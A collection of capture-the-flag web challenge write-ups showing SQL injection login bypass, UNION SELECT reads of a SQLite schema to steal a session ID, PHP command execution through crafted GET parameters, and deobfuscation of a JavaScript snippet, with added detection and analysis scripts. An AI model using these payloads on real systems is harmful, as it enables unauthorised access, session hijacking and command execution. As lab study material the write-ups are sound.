Not Another SQLi Challenge
283
Difficulty: easy
Accessing the URL shows the following page. Let's try SQL injection.
Entering admin as the NetID and ' or 1=1# as the Password and clicking Login displays the flag, as shown in the figure below.
The flag is
gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}.
Web - 100 points
for i in `seq 1 1000`; do
  out=`curl 138.247.13.110/todolist/$i/`
  if [ "`echo $out | grep MCA{`" ]; then break; fi
done
echo $out
<!DOCTYPE html> <html lang="en"> <head> <!-- Basic Page Needs –––––––––––––––––––––––––––––––––––––––––––––––––– --> <meta charset="utf-8"> <title>Todolist</title> <meta name="description" content="Small todolist app."> <meta name="author" content="Christian Rotzoll"> <!-- Mobile Specific Metas –––––––––––––––––––––––––––––––––––––––––––––––––– --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- FONT –––––––––––––––––––––––––––––––––––––––––––––––––– --> <link href='http://fonts.googleapis.com/css?family=Raleway:400,300,600' rel='stylesheet' type='text/css'> <!-- CSS –––––––––––––––––––––––––––––––––––––––––––––––––– --> <link rel="stylesheet" type='text/css' href="https://cdnjs.cloudflare.com/ajax/libs/normalize/3.0.2/normalize.min.css"> <link rel="stylesheet" type='text/css' href="https://cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css"> <link rel="stylesheet" type='text/css' href="/static/css/custom.css"> <!-- Scripts –––––––––––––––––––––––––––––––––––––––––––––––––– --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script> <script type="text/javascript" src="/static/js/site.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/moment.js/2.9.0/moment.min.js"></script> <script src="/static/lists/js/lists.js"></script> <!-- Favicon –––––––––––––––––––––––––––––––––––––––––––––––––– --> <link rel="icon" type="image/png" href="/static/images/favicon.png" /> </head> <body> <!-- Primary Page Layout –––––––––––––––––––––––––––––––––––––––––––––––––– --> <div class="container"> <!-- Navigation –––––––––––––––––––––––––––––––––––––––––––––––––– --> <div class="navbar-spacer"></div> <nav class="navbar"> <div class="container"> <ul class="navbar-list"> <li class="navbar-item"><a class="navbar-link" href="/">Todolist</a></li> <li class="navbar-item"></li> </ul> </div> </nav> <section class="header"> <div class="row"> <div class="three columns 
value-prop"></div> <div class="six columns"> <div class="title">By MITRECTF:</div> <form action="/todo/add/678/" method=post> <input type='hidden' name='csrfmiddlewaretoken' value='0rG0HOuNVMinZEZvzuh0ONCZ1ExYstCr1bcbeEVMcSvYOxfxITknt7T0Krwykcn7' /> <tr><th></th><td><input type="text" name="description" class="u-full-width" id="id_description" placeholder="Enter your todo" required maxlength="128" /></td></tr> <input type="submit" value="Submit"> </form> </div> <div class="row"> <div class="one-half column open-todos"> <h6 class="docs-header open-todos">1 open</h6> <ul> <li><input type="checkbox" id="checkbox" data-todo-id="678"> MCA{al3x4_5et_a_r3minder}</li> </ul> </div> <div class="one-half column finished-todos"> <h6 class="docs-header finished-todos">0 finished</h6> <ul> </ul> </div> </div> </div> </section> </div> <!-- End Document –––––––––––––––––––––––––––––––––––––––––––––––––– --> </body> </html>
The flag is MCA{al3x4_5et_a_r3minder}.
Maria is the only person who can view the flag
X-Forwarded-For is an HTTP header field; it is the de facto standard for identifying the source IP address of a client that reaches a web server through a device such as a load balancer.
Two table names were obtained with the following payload:
' union select 1, 2, 3, group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--
PHPSESSID=nxf8_users%2Cnxf8_sessions;
The CREATE TABLE statement was retrieved with the following payload:
' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_users'--
PHPSESSID=CREATE+TABLE+%22nxf8_users%22+%28%0A++++++++++++%22id%22+int%2810%29+NOT+NULL%2C%0A++++++++++++%22name%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22email%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22password%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22role%22+varchar%28100%29++DEFAULT+NULL%0A++++++++%29;
CREATE TABLE "nxf8_users" ("id" int(10) NOT NULL,"name" varchar(255) NOT NULL,"email" varchar(255) NOT NULL,"password" varchar(255) NOT NULL,"role" varchar(100) DEFAULT NULL);
' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_sessions'--
CREATE TABLE "nxf8_sessions" ("id" int(10) NOT NULL,"user_id" varchar(255) NOT NULL,"ip_address" varchar(255) NOT NULL,"session_id" varchar(255) NOT NULL);
' union select 1, 2, 3, id FROM nxf8_users where name = 'Maria'--
PHPSESSID=5;
' union select 1, 2, 3, session_id FROM nxf8_sessions where user_id = '5'--
PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968;
Cookie: PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968;
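Both of the injections above (the ' or 1=1# login bypass and the UNION SELECT reads from sqlite_master) leave recognisable traces in the web server's access log. The following is an added example, not part of the write-up, that scans constructed access-log lines for those traces after undoing the URL encoding the payloads travel in. The log format, hosts and sample lines are all made up for the demo.

```javascript
// Added example, not part of the write-up: flag access-log lines that carry the
// injection patterns seen above (tautology in a login form, UNION SELECT against
// sqlite_master). The log format and every sample line are constructed.
const SQLI_PATTERNS = [
  { name: 'union-select', re: /\bunion\b\s+(all\s+)?select\b/i },
  { name: 'sqlite-schema', re: /\bsqlite_master\b/i },
  { name: 'tautology', re: /\bor\b\s+1\s*=\s*1\b/i },
  { name: 'quote-comment', re: /'\s*(--|#)/ },
];

function requestTarget(line) {
  // Pull the request-target out of the quoted "METHOD /path?query HTTP/x" field;
  // fall back to the whole line if the format does not match.
  const m = line.match(/"[A-Z]+ (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : line;
}

function normalize(raw) {
  // Treat '+' as a space (form encoding), percent-decode up to twice so that
  // double-encoded payloads surface, and collapse runs of whitespace.
  let s = raw.replace(/\+/g, ' ');
  for (let i = 0; i < 2; i++) {
    try {
      const decoded = decodeURIComponent(s);
      if (decoded === s) break;
      s = decoded;
    } catch (e) {
      break; // malformed escape sequence: keep what we have
    }
  }
  return s.replace(/\s+/g, ' ');
}

function classify(line) {
  const text = normalize(requestTarget(line));
  const matched = SQLI_PATTERNS.filter((p) => p.re.test(text)).map((p) => p.name);
  return { line, matched, suspicious: matched.length > 0 };
}

function scanLog(lines) {
  return lines.map(classify).filter((r) => r.suspicious);
}

// Constructed sample lines in Apache combined-log style (no real hosts).
const SAMPLE_LOG = [
  '10.0.0.7 - - [12/Mar/2019:10:01:02 +0000] "GET /index.php?page=menu HTTP/1.1" 200 1843',
  '10.0.0.7 - - [12/Mar/2019:10:01:09 +0000] "POST /login.php?netid=admin&password=%27+or+1%3D1%23 HTTP/1.1" 302 0',
  '10.0.0.9 - - [12/Mar/2019:10:02:15 +0000] "GET /user.php?id=%27+union+select+1%2C+2%2C+3%2C+group_concat%28tbl_name%29+FROM+sqlite_master+WHERE+type%3D%27table%27-- HTTP/1.1" 200 611',
  '10.0.0.7 - - [12/Mar/2019:10:03:30 +0000] "GET /search.php?q=order+form HTTP/1.1" 200 902',
];

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(hit.matched.join(','), '|', hit.line);
}
```

The patterns are deliberately narrow (a keyword pair, the schema table name, a tautology, a quote followed by a comment marker) so that ordinary query strings such as "order form" do not trip them; decoding before matching matters because the payloads arrive as %27, %3D and '+' rather than as the literal characters shown in the write-up.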
aj9dhAdf4
not pretty much many options. No need to open a link from a browser, there is always a different way
<!--var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];function reverse(_0xa6e5x2){flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])}console[_0x7f88[4]]= reverse;console[_0x7f88[4]](_0x7f88[5])-->
2b323f9008ed771765cd2259d860baec
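The script above uses the common "string array" obfuscation: every property name and literal is pulled from the _0x7f88 table by index. The following is an added example, not part of the write-up, that inlines that table so the code can be read without running it, then applies the recovered logic (reverse the string) directly. OBFUSCATED is the snippet from the page; inlineStringArray and reverseString are this example's own functions.

```javascript
// Added example, not part of the write-up: inline a "string array" obfuscation
// (the var _0x....=[...] table and its _0x....[n] lookups) so the script can be
// read, then apply the recovered logic directly instead of evaluating it.
// OBFUSCATED is the snippet from the challenge page.
const OBFUSCATED =
  'var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];' +
  'function reverse(_0xa6e5x2){flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])}' +
  'console[_0x7f88[4]]= reverse;console[_0x7f88[4]](_0x7f88[5])';

function inlineStringArray(src) {
  // 1. Locate the lookup table:  var <name> = [ ... ];
  const m = src.match(/var\s+(_0x[0-9a-f]+)\s*=\s*(\[[^\]]*\])\s*;/i);
  if (!m) throw new Error('no string-array declaration found');
  const [decl, name, arrayLiteral] = m;
  const table = JSON.parse(arrayLiteral); // the literal is a plain JSON array of strings
  let out = src.replace(decl, '');

  // 2. Replace each <name>[<index>] with the string literal it stands for.
  const lookup = new RegExp(name + '\\[(\\d+)\\]', 'g');
  out = out.replace(lookup, (_, idx) => {
    const i = Number(idx);
    if (i >= table.length) throw new Error(`index ${i} out of range`);
    return JSON.stringify(table[i]);
  });

  // 3. Rewrite obj["prop"] as obj.prop when prop is a plain identifier.
  return out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, '.$1');
}

// What the deobfuscated script does: reverse the string. Note that it also
// overwrites console.log with that function, so running it prints nothing;
// the result only lands in the global `flag`.
function reverseString(s) {
  return s.split('').reverse().join('');
}

const DEOBFUSCATED = inlineStringArray(OBFUSCATED);
const RECOVERED = reverseString('ceab068d9522dc567177de8009f323b2');
console.log(DEOBFUSCATED);
console.log(RECOVERED); // 2b323f9008ed771765cd2259d860baec
```

Reading the inlined form makes the trick obvious: console.log is replaced by reverse before it is called, which is why nothing appears in the browser console and the answer has to be recovered statically.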
Web - 50 points
It took a lot of courage but our great team accomplished the unthinkable. We are happy to announce a fantastic new express checkout experience. Our customers are going to love it! This new workflow has your items delivered to someone else in no time flat!
The flag is MCA{aCzb163wL9}.
Web - 100 points
We see you’re running an ad-blocker. To view this content consider opening yourself up to malware. You can also subscribe for $9.99/month and still receive ads!
MCA{Ads_Supp0rt_webSit3z_MON$Y}
Beautify php code! Here
First, the POST parameter b has to be sent as an array holding the two values 'admin' and 'oloco', but element 0 must not be 'admin', so we exploit a PHP bug and send it as shown below. 2^32 = 4294967296. In the array comparison (===) this is treated as a match (true), but accessing element 0 of the array finds it uninitialized.

<?php
include('oshit.php');
$g_s = ['admin','oloco'];
$__ni = $_POST['b'];
$_p = 1;
if(isset($_GET['source'])){
    highlight_file(__FILE__);
    exit;
}
if($__ni === $g_s & $__ni[0] != 'admin'){
    $__dgi = $_GET['x'];
    $__dfi = $_GET;
    foreach($__dfi as $_k_o => $_v){
        if($_k_o == $k_Jk){
            $f = 1;
        }
        if($f && strlen($__dgi)>17 && $_p == 3){
            $k_Jk($_v,$_k_o); //my shell :)
        }
        $_p++;
    }
}else{
    echo "noob!";
}

b[4294967296]=admin&b[1]=oloco

Using Fiddler's [Replay] - [Reissue and Edit], send the following request.

?x=123456789012345678&0=0&ls=system

Next, send the following request with Fiddler.

?x=123456789012345678&0=0&ls%09/var=system

The following result came back:

backups cache flag lib local lock log opt run spool tmp www

Sending the following request displayed the flag.

?x=123456789012345678&0=0&cat%09/var/flag=system

ASIS{f52c5a0cf980887bdac6ccaebac0e8428bfb8b83}

The flag is
ASIS{f52c5a0cf980887bdac6ccaebac0e8428bfb8b83}.
var net = require('net');
flag='fake_flag';
var server = net.createServer(function(socket) {
  socket.on('data', (data) => {
    //m = data.toString().replace(/[\n\r]*$/, '');
    ok = true;
    arr = data.toString().split(' ');
    arr = arr.map(Number);
    if (arr.length != 5)
      ok = false;
    arr1 = arr.slice(0);
    arr1.sort();
    for (var i=0; i<4; i++)
      if (arr1[i+1] == arr1[i] || arr[i] < 0 || arr1[i+1] > 127)
        ok = false;
    arr2 = []
    for (var i=0; i<4; i++)
      arr2.push(arr1[i] + arr1[i+1]);
    val = 0;
    for (var i=0; i<4; i++)
      val = val * 0x100 + arr2[i];
    if (val != 0x23332333)
      ok = false;
    if (ok)
      socket.write(flag+'\n');
    else
      socket.write('nope\n');
  });
  //socket.write('Echo server\r\n');
  //socket.pipe(socket);
});
HOST = '0.0.0.0'
PORT = 23333
server.listen(PORT, HOST);

$ nc 47.75.4.252 23333
15 20 31 4 47
*ctf{web_chal_made_by_binary_players_lol}
*ctf{web_chal_made_by_binary_players_lol}
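The reason the unsorted-looking input 15 20 31 4 47 is accepted is that arr1.sort() is called without a comparator, and Array.prototype.sort() then orders the elements as strings ("31" sorts before "4"). The following is an added example, not part of the write-up or the challenge server, that re-implements the check with the comparator as a parameter so the deployed behaviour and a numeric sort can be compared side by side; validate, asDeployed, hardened and countNumericSolutions are this example's own names.

```javascript
// Added example, not part of the write-up or the challenge server: the check
// above re-implemented as a function whose sort comparator is a parameter, to
// show why "15 20 31 4 47" is accepted. Array.prototype.sort() with no
// comparator orders values as strings, so [15,20,31,4,47] is already "sorted"
// ("31" < "4") and the distinct/ascending checks never see the real order.
function validate(line, compare) {
  const arr = line.trim().split(' ').map(Number);
  if (arr.length !== 5) return false;
  const sorted = arr.slice().sort(compare); // compare === undefined -> default string order
  for (let i = 0; i < 4; i++) {
    if (sorted[i + 1] === sorted[i] || arr[i] < 0 || sorted[i + 1] > 127) return false;
  }
  // Adjacent sums are packed into a 32-bit value: 0x23 0x33 0x23 0x33.
  let val = 0;
  for (let i = 0; i < 4; i++) val = val * 0x100 + sorted[i] + sorted[i + 1];
  return val === 0x23332333;
}

const asDeployed = (line) => validate(line, undefined); // the server's behaviour
const numeric = (a, b) => a - b;
const hardened = (line) => validate(line, numeric);     // what was presumably intended

// With a numeric sort the constraints cannot be met at all: a2 + a3 = 35 with
// a2 < a3 forces a2 < 17.5, while a1 + a2 = 51 with a1 < a2 forces a2 > 25.5.
// Enumerating a0 confirms it; the four sums fix every other value.
function countNumericSolutions() {
  let count = 0;
  for (let a0 = 0; a0 <= 127; a0++) {
    const a1 = 0x23 - a0, a2 = 0x33 - a1, a3 = 0x23 - a2, a4 = 0x33 - a3;
    const t = [a0, a1, a2, a3, a4];
    const increasing = t.every((v, i) => i === 0 || v > t[i - 1]);
    const inRange = t.every((v) => v >= 0 && v <= 127);
    if (increasing && inRange && hardened(t.join(' '))) count++;
  }
  return count;
}

console.log(asDeployed('15 20 31 4 47')); // true
console.log(hardened('15 20 31 4 47'));   // false
console.log(countNumericSolutions());     // 0
```

The takeaway for anyone writing input validation in JavaScript: always pass a numeric comparator when sorting numbers, and test the validator against inputs that a string sort and a numeric sort order differently.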
Open the URL given in the challenge.
Warm Up
150
When warmup becomes magical, security disintegrates.
The flag is inctf{Y0u_C4n_N3v3r_F1nd_7h1s_Fl4g}.
Open the website given in the challenge. Clicking a link on the site produces a URL like the one shown below; it appears that pages are switched with a parameter.
Bon Appétit (100) - 73 solves
We are creating a new web-site for our restaurant. Can you check if it is secure enough?
The flag is flag{82d8173445ea865974fc0569c5c7cf7f}.